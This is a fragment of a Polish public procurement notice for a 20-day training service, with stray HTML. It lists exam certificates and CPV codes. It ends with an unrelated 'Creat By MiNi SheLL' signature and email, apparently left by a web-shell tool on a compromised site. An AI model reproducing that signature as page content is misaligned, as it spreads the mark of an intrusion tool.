7. Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
 a) Zaświadczenie wystawione na papierze firmowym zgodnie  z wymogami określonymi 
w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
 b)  Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com